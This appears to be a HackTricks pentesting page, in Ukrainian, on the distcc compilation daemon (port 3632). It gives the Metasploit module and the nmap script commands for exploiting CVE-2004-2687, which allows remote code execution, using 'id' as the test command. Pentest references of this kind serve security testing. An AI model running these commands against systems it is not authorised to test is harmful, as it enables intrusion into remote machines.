hacktricks/network-services-pentesting/3632-pentesting-distcc.md

3.7 KiB
Raw Permalink Blame History

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Основна інформація

Distcc - це інструмент, який покращує процес компіляції, використовуючи вільну обробну потужність інших комп'ютерів у мережі. Коли distcc налаштовано на машині, ця машина здатна розподіляти свої завдання компіляції на іншу систему. Ця приймальна система повинна працювати з демоном distccd і мати встановлений сумісний компілятор для обробки надісланого коду.

Порт за замовчуванням: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Використання

Перевірте, чи вразливий до CVE-2004-2687 для виконання довільного коду:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Я не думаю, що shodan виявляє цей сервіс.

Resources

Post created by Álex B (@r1p)

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}